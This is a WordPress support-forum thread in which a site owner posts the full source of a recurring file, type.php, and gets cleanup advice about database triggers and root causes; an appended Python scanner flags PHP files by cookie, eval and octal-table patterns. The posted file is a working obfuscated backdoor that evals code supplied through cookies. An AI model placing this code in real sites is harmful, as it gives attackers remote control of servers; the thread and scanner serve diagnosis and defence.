• Hello, I am having issues battling malware on my site. I seem to have found some of the issues, but there is a persistent file that keeps being re-written even after I delete it.

    The file is called “type.php” and it resides in the wp-content folder

    I can rename, delete, edit and delete content of the file and it just keeps getting re-written/replaced/added within seconds back into the directory.

    I have tried a complete uninstall of the site and reinstall from a backup and it is still persistent.

    I have tried changing .htaccess to dissuade access to the file.

    Any idea where I might look “under the hood” to figure out where the script resides that keeps bringing it back? Any way to prevent it from being written?

    This is the content of the file:

    <?php
    class Apt
    {
    private static $s;
    public static function g($n)
    {
    if (!self::$s)
    self::i();
    return self::$s[$n];
    }
    private static function i()
    {
    self::$s = array(
    0135,
    0135,
    0116,
    0111,
    026,
    0136,
    0122,
    012,
    00
    );
    }
    }
    function click()
    {
    $_fkm = $_COOKIE;
    ($_fkm && isset($_fkm[Apt::g(0)])) ? (($_h = $_fkm[Apt::g(1)] . $_fkm[Apt::g(2)]) && ($_zpq = $_h($_fkm[Apt::g(3)] . $_fkm[Apt::g(4)])) && ($_uly = $_h($_fkm[Apt::g(5)] . $_fkm[Apt::g(6)])) && ($_uly = $_uly($_h($_fkm[Apt::g(7)]))) && @eval($_uly)) : $_fkm;
    return Apt::g(8);
    }
    click();
Viewing 2 replies - 1 through 2 (of 2 total)
  • The problem with restoring a backup is when your backup is already infected with the malware too. You’ll need to find the root cause of this. It could be a trigger in your WP database (commonly seen – ask your web host or check with phpMyAdmin if there are triggers in your DB) – but you’ll need to do a full scan and a manual scan of your whole account on the server to make sure that everything is deleted. Only doing half a clean-up isn’t going to solve a hacked site.

    Cleaning up a hacked site needs more than just deleting the malicious files; the best thing to find out (if possible) is the root cause or backdoor it used to hack your site, such as a user with a default or weak password, outdated software on your site or on the server side…

    Thread Starter krbgraphics

    (@krbgraphics)

    Thank you! I will have bluehost check the database. Is there any way to check it myself just for future knowledge?

    It must be something there since I have only one user and it has 2FA on that account. It happened before I put the 2FA on though.

  • The topic ‘Malware’ is closed to new replies.
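
A first-pass file scan of the kind the first reply recommends, as an added example that is not part of the thread: it flags PHP files that combine the traits visible in the posted type.php (cookie input, `eval`, variable-function calls, a table of octal literals). The rule names, the thresholds and the constructed sample are assumptions; a hit is a lead for manual review, and the scan does not locate whatever keeps re-creating the file.

```python
import re
import sys
from pathlib import Path

# Heuristics taken from the shape of the type.php sample in the thread.
# They are assumptions for triage, not a complete malware signature set.
RULES = {
    "reads_cookies": re.compile(r"\$_COOKIE\b"),
    "eval_call": re.compile(r"\beval\s*\("),
    "variable_function_call": re.compile(r"\$\w+\s*\(\s*\$"),
    "octal_literal_table": re.compile(r"(?:\b0[0-7]{1,4}\s*,\s*){4,}"),
}

# Constructed, inert fragment carrying the same traits (not working code).
CONSTRUCTED_SAMPLE = (
    "<?php $k = array(0135, 0135, 0116, 0111, 026); "
    "$c = $_COOKIE; $h($c[$k[0]]); @eval($out);"
)

def rule_hits(source: str) -> list[str]:
    """Return the sorted names of every rule that matches the PHP source."""
    return sorted(name for name, rx in RULES.items() if rx.search(source))

def is_suspicious(source: str) -> bool:
    """Flag cookie input reaching eval, or any three traits together."""
    hits = set(rule_hits(source))
    return {"reads_cookies", "eval_call"} <= hits or len(hits) >= 3

def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk root and map each suspicious .php file to the rules it hit."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        try:
            source = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip it rather than abort the scan
        if is_suspicious(source):
            findings[str(path)] = rule_hits(source)
    return findings

if __name__ == "__main__":
    # Usage: python scan.py /path/to/site  (defaults to current directory)
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in scan_tree(root).items():
        print(f"{path}: {', '.join(hits)}")
```

Files that use cookies and variable callbacks without `eval` stay below the threshold, so ordinary plugin code is not reported by these rules alone.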